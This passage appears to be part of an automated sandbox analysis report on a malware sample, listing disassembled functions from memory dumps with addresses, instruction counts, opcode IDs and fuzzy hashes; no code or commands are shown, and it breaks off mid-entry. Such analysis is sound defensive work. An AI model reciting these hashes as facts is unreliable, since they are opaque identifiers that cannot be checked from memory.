                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4dce1e3b0cb93b8cb6bb5a910b6167631d0198db3d1081b77aed3d66a7eefe6
                                                        • Instruction ID: cc0c7a2596217163003e75f8044a7ac9c3e66a9ea22be31ef8cfcfe7af58e818
                                                        • Opcode Fuzzy Hash: d4dce1e3b0cb93b8cb6bb5a910b6167631d0198db3d1081b77aed3d66a7eefe6
                                                        • Instruction Fuzzy Hash: B75112345152A7AFDB26FB3AF8809943BB1F7523087144B69D2049F26EDB303907DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01331138 Relevance: .1, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb4603b06a77cbd36be0fb41b7ab6ae554eb638e57153113b146ee583fea6089
                                                        • Instruction ID: cef11a2d4ae59a4251d6af6bc69bc40d5c0a8bbf595606ceabf19275481b1b49
                                                        • Opcode Fuzzy Hash: fb4603b06a77cbd36be0fb41b7ab6ae554eb638e57153113b146ee583fea6089
                                                        • Instruction Fuzzy Hash: 4C510F345112A7AFDB26FB3AF8809543BB1F7513087144B69D2049F26EDB307906DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013326DC Relevance: .1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae9de4850020c3e3e158fdc857347b9f527c3c52ea7595b68523fa90dd94bf81
                                                        • Instruction ID: bdde566fe1558683b3759b692139d41ad0a793ad26087286d31f65052742a5f8
                                                        • Opcode Fuzzy Hash: ae9de4850020c3e3e158fdc857347b9f527c3c52ea7595b68523fa90dd94bf81
                                                        • Instruction Fuzzy Hash: 8241EEB4D00348DFEB14DFA9C484ADEBBB5FF48314F14842AE809AB250DB75994ACB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01335098 Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a4071724b5046e3a17587472f5802dba83e04082d72557edf1d8027bfb8cb51
                                                        • Instruction ID: 23343080d814cf82bd73368437304cb22bf2335896376c1855a89255807aaaa3
                                                        • Opcode Fuzzy Hash: 8a4071724b5046e3a17587472f5802dba83e04082d72557edf1d8027bfb8cb51
                                                        • Instruction Fuzzy Hash: 2C315230B003158FDF29EB78C5506AD77F2AF89249F100568D901EB359DB7ADC42CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013326E8 Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06629dc843a4097760565bbba2ca278ec6f90ab584d2d865ba42e63688506e19
                                                        • Instruction ID: e0a2ef3b3d2c42957f0747050945716510bbd8f59146984d66fc90368948686f
                                                        • Opcode Fuzzy Hash: 06629dc843a4097760565bbba2ca278ec6f90ab584d2d865ba42e63688506e19
                                                        • Instruction Fuzzy Hash: 7241EDB4D0034C9FEB14DFA9C484ADEBBF5BF48314F20802AE809AB250DB75A945CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013350A8 Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d27bf9ef3dc8642c6435e0c1a1de7e792c10ad04f5e8b6ec75cedb50da556605
                                                        • Instruction ID: a018bf3d369e842783f28c4190605957a4fc5f7c6b7f92f4695837af6d4ba89a
                                                        • Opcode Fuzzy Hash: d27bf9ef3dc8642c6435e0c1a1de7e792c10ad04f5e8b6ec75cedb50da556605
                                                        • Instruction Fuzzy Hash: 63311E30B003259FDF29EB79C5506AEB7F6AF89249F100568D901AB398DF36DC42CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01339930 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc58d7527907a15a04157a5121b0f235a900bfed849f2d19bf5254a4f8d6d152
                                                        • Instruction ID: cabae1b1a06a50b3f2a2d06e7ae9897aae6cbeb430573010223dd9950e3a1e39
                                                        • Opcode Fuzzy Hash: bc58d7527907a15a04157a5121b0f235a900bfed849f2d19bf5254a4f8d6d152
                                                        • Instruction Fuzzy Hash: 6A315230A1021ADBDF15DF69D45079EBBB2FF89308F14861AE805EB345EB709D86CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01330B4D Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 303bf42db0e505a16ff977df1847b0452fb514f41ff2abd7767571fd249984b8
                                                        • Instruction ID: c55f166a94dc9dff4e484548a7c1e3f9a06ef277e5ed8bcc6b5a4af79c1536bf
                                                        • Opcode Fuzzy Hash: 303bf42db0e505a16ff977df1847b0452fb514f41ff2abd7767571fd249984b8
                                                        • Instruction Fuzzy Hash: 7E21F66592C386DAF72F8A7C50AC3756B989BE226CB840869E1C1CB02FC658C075D15E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01331380 Relevance: .1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f2a739b7e1e8fd181b4166ca818079b1d5d15c72e00d40efc774b1a698c6d688
                                                        • Instruction ID: 3a723fa4562b63cc288a54acb8002942ac6f05259e2feb2332223170363dbb50
                                                        • Opcode Fuzzy Hash: f2a739b7e1e8fd181b4166ca818079b1d5d15c72e00d40efc774b1a698c6d688
                                                        • Instruction Fuzzy Hash: EC21C834A002118FDF72973CE0987AD37B1E7C2369F10096AD146DB795E62D8C86D756
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013316A0 Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a82ec63a22d7703355e6c99564b0bc83d78561b6b11f7fb5edf01e57880c0f41
                                                        • Instruction ID: b4d458f2fece07d9b82b6ff006862d8679db6a45b64479acff3554c9c848b1ea
                                                        • Opcode Fuzzy Hash: a82ec63a22d7703355e6c99564b0bc83d78561b6b11f7fb5edf01e57880c0f41
                                                        • Instruction Fuzzy Hash: 6321F738A002105FDF63EB7DE8847EA37A5EB85368F144A65D005CB25AEB34CC459BD6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01339940 Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c4a92cc86ca6a4c1e8a9c4878d602fbc9f47f4b8b35c6832091e52a9be6e382
                                                        • Instruction ID: 8a171e1ed1571fcc739d17e37ba44e64b6114aac7c32e2595ae3c01f13fd9444
                                                        • Opcode Fuzzy Hash: 5c4a92cc86ca6a4c1e8a9c4878d602fbc9f47f4b8b35c6832091e52a9be6e382
                                                        • Instruction Fuzzy Hash: 1B217130E1021ADBDF05DF69D45079EBBB2FF89308F10861AE805EB345EBB09D468B94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0133A11B Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e5eb964f138b6b2ce04a53a10ea345f3f25debc02ba1555c7ed7563911bef7b
                                                        • Instruction ID: b884dc41c7e066ab686c8bb1dc8f19fae8c0f295d2a918d8f91e0e00e8e84719
                                                        • Opcode Fuzzy Hash: 3e5eb964f138b6b2ce04a53a10ea345f3f25debc02ba1555c7ed7563911bef7b
                                                        • Instruction Fuzzy Hash: 6D21C130E101049FEB14CB6CC954BAE7BFABFC8724F148169E505EB3A1DA718C408794
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013317C0 Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 20edce9af571b6fea5267099e9da14e162cf4fb71090927f75f3a14d42a98217
                                                        • Instruction ID: 7fbaed1bd7436fb586ce377fbbf98e15d4db4794824173035eaedf982b9deae9
                                                        • Opcode Fuzzy Hash: 20edce9af571b6fea5267099e9da14e162cf4fb71090927f75f3a14d42a98217
                                                        • Instruction Fuzzy Hash: 5821F272F043929FCB139B7D98042AE3FB5AB89224F080966E545DB346EB28C8428795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01339831 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1959ebca9bae994749c2ce9d2b32cfa077fc6cf4cf1b0effc42f65b753de95a1
                                                        • Instruction ID: 025c49fe5b3e9ce50ff63c81d5124bcbfc24959551c93be45635bafe1c90cfeb
                                                        • Opcode Fuzzy Hash: 1959ebca9bae994749c2ce9d2b32cfa077fc6cf4cf1b0effc42f65b753de95a1
                                                        • Instruction Fuzzy Hash: 0A218371E00215DFDB19CF68C4507DEBBB2AFC9314F14855AE811BB351DBB19945CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0133148B Relevance: .1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 666f1ca0d8c95431e966e7cc9d75fab197bb3a42288b24685ce9ccd57f404053
                                                        • Instruction ID: 18abe5d5684c1a0584973e08b4a07f1996b980ddbb3d0bd2a04c6f865cd76b86
                                                        • Opcode Fuzzy Hash: 666f1ca0d8c95431e966e7cc9d75fab197bb3a42288b24685ce9ccd57f404053
                                                        • Instruction Fuzzy Hash: 4821B131E002559FCF269FBC84502EE7BF5EFC5228F1900B6D845EB242E639C8428B98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012ED20C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3698496198.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_12ed000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 94ff2cc37200ed13e67ca9169f34f26366b4b7b02474534870eb61f71405069b
                                                        • Instruction ID: c3bb0bc25c9f841f4b1449a9f3f890609301d1dae0d542392dcd10a52f2dbb0b
                                                        • Opcode Fuzzy Hash: 94ff2cc37200ed13e67ca9169f34f26366b4b7b02474534870eb61f71405069b
                                                        • Instruction Fuzzy Hash: 6B212671914248DFDB11DF94D5C8B26BBE5FB84334F60C569E9490B243C376D446CA62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012ED044 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3698496198.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_12ed000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cb382665015a203aa924ddcf6e330d46ef50c6caf67322152b9624b546de4fe
                                                        • Instruction ID: 809d320d5af499e4c76624be529df47b5b26d0787376fb15c8c6285549b10c30
                                                        • Opcode Fuzzy Hash: 8cb382665015a203aa924ddcf6e330d46ef50c6caf67322152b9624b546de4fe
                                                        • Instruction Fuzzy Hash: CC212271514208AFDB15DF64C9C8B26BFE1FB84314F68C96DE94A0F282C776D447CA62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012ED3BC Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3698496198.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_12ed000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4e543a1887bf4a8def18dbbe77934c074ffdd8cc42e2fbd47dcc10718425d089
                                                        • Instruction ID: 4458b7eb489fc1199ca9fdf4b584089f2e37a5c362ba863883216ba86734c219
                                                        • Opcode Fuzzy Hash: 4e543a1887bf4a8def18dbbe77934c074ffdd8cc42e2fbd47dcc10718425d089
                                                        • Instruction Fuzzy Hash: D0214675514308EFDB15DF64D5C8B26BBE1FB84314F60C56DE90A0F282C376E446CA62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01331878 Relevance: .1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4377f8a5e19fb20c4304aa30e0474c959b8f7bfcdd33a29a97231852a16861df
                                                        • Instruction ID: d3eae85dc794be262a73f52bb3e2489d9c8a9ccab9faaacb889ee84836c79ecf
                                                        • Opcode Fuzzy Hash: 4377f8a5e19fb20c4304aa30e0474c959b8f7bfcdd33a29a97231852a16861df
                                                        • Instruction Fuzzy Hash: 3021A130B00219CFDB24DB38C5657AE7BF6EF89244F100568D145EB394DB368D41CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01339840 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 71a57400cfbddb50412851611af5f810de2d56a33a9ba46eb37c1c47c92e3859
                                                        • Instruction ID: 4b74717bbea9c3b4dc9b720aa65febb8b7fb76f8bb55b0fc4f71c0a8b3f95182
                                                        • Opcode Fuzzy Hash: 71a57400cfbddb50412851611af5f810de2d56a33a9ba46eb37c1c47c92e3859
                                                        • Instruction Fuzzy Hash: F5215030E00319DBDB19CFA9D45069EBBB6EFC9318F10861AE815BB341DBB19D46CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01331888 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0860ea51c7cb48373ea444deb9b10fec55804231f64dcf441d925d6651b75001
                                                        • Instruction ID: b52c2c39e30749aac358a284c56b877e55a38bcaffc692b39d454bd511a9c62e
                                                        • Opcode Fuzzy Hash: 0860ea51c7cb48373ea444deb9b10fec55804231f64dcf441d925d6651b75001
                                                        • Instruction Fuzzy Hash: FE214C30B002198FDB24EB78C5647AEB7F6AF89249F100468D506EB354DB369D41CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01334F88 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86eeb0630ddb1a257e1c9726e73089f48891b8ac818cc6f149076be720c322b8
                                                        • Instruction ID: 54344445aae33212c848893b499bf1df59e058b96134e28fb7eae0eb194b7e22
                                                        • Opcode Fuzzy Hash: 86eeb0630ddb1a257e1c9726e73089f48891b8ac818cc6f149076be720c322b8
                                                        • Instruction Fuzzy Hash: 52210A30B00255CFDB14EB78D558AADB7F2EF89218F1004ACE506EB3A5DB369D01CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013316B0 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 347da3c3df8bebcda42aeeb954806d265b4683acf0d2c5bcafc0ebd6e4aa0121
                                                        • Instruction ID: bc2a096bd02fdcc2d2ebe7d23e0f0e06c7a54cd0e5fbcaed794c12cdea043751
                                                        • Opcode Fuzzy Hash: 347da3c3df8bebcda42aeeb954806d265b4683acf0d2c5bcafc0ebd6e4aa0121
                                                        • Instruction Fuzzy Hash: 1B21E738A002105FDF63EB3DE88479A37A6EB81368F104B25D005CB35AEB35DC458BD5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01334F98 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d1ea57dafb7cd91a9f88a996a8bed819fcbd0e33b865238a777cb8de70005d8
                                                        • Instruction ID: fe6644985c86aa7f36bbc18beb2a9cd77b831d79eddbad843a897fde756f4037
                                                        • Opcode Fuzzy Hash: 1d1ea57dafb7cd91a9f88a996a8bed819fcbd0e33b865238a777cb8de70005d8
                                                        • Instruction Fuzzy Hash: 4621FA307002158FDB14EB79D558AADB7F2EB89618F10046CE506EB365DB369D01CB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012ED207 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3698496198.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_12ed000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8fbc9ecfa64d6cd6169a34e6f0bd23febabaae063db22b202cb29621ee734798
                                                        • Instruction ID: 3ac8966d186fe9107c97539eccba8d154d9d8e17fb7cffa431d4e259289b0b22
                                                        • Opcode Fuzzy Hash: 8fbc9ecfa64d6cd6169a34e6f0bd23febabaae063db22b202cb29621ee734798
                                                        • Instruction Fuzzy Hash: 97119D76504288CFDB12CF54D5C8B16BBA1FB84324F24C6AAD9494B657C33AD40ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012ED03F Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3698496198.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_12ed000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction ID: 449f2daeb293a2e158aa704dc70e2e602f30d9c14424abe0be585760e3d78bbd
                                                        • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction Fuzzy Hash: D011D075504244CFCB12CF54D5C8B15BFA1FB44314F28C6A9D9494B652C33AD44ACF62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012ED3B7 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3698496198.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_12ed000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction ID: 14d0c41ee3f5250551a86bc57294c014b1b66f3f56e603840b15d573a373ed2a
                                                        • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction Fuzzy Hash: D011DD79504284CFCB12CF64D5C8B15BFB2FB84314F24C6AAD9494B656C33AE40ACFA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01331498 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80a3f4ae5f9413098d13c9808207d65c0a81c38999b3be7baf6d6efe2c406bdc
                                                        • Instruction ID: 9a148496085a164eb32fb51692fe9cce8539aad2e043fd1e9f30b4bec6321732
                                                        • Opcode Fuzzy Hash: 80a3f4ae5f9413098d13c9808207d65c0a81c38999b3be7baf6d6efe2c406bdc
                                                        • Instruction Fuzzy Hash: 14014C31E002169FDF25EFBC84501AEBBF5EB88258F24457AD806E7341E635C8428B99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013387D0 Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c6cf8e6d48ab78d3f66479257fdaf8412d2c4fe23a608b7ce8b0104cb687f1e8
                                                        • Instruction ID: 6d5e3075cd7215a6572a0b5c47d16c33f5304e62dc26b92732b460d4c4011e4d
                                                        • Opcode Fuzzy Hash: c6cf8e6d48ab78d3f66479257fdaf8412d2c4fe23a608b7ce8b0104cb687f1e8
                                                        • Instruction Fuzzy Hash: 2E019A34910309AFCF82EFB9E85069DBBF1EF41310B1046A6C0058F259EB306E04CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013340FF Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 101f9238687fe241a8cd0e3df5f7562f5da06593714139c727a4096e2165aa03
                                                        • Instruction ID: 584a2857cb4b827e95a7307b41909132df74bd595dfca9204052e320f235bcad
                                                        • Opcode Fuzzy Hash: 101f9238687fe241a8cd0e3df5f7562f5da06593714139c727a4096e2165aa03
                                                        • Instruction Fuzzy Hash: 8311B330E00A4DDEDF34DB9CE9987EDBB72AFA521DF14152AD011A21909B3448C5CB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01331524 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f51b7264d4bef76102d279a50562111152197c7d1a05efd413a0e72b0e3b47f0
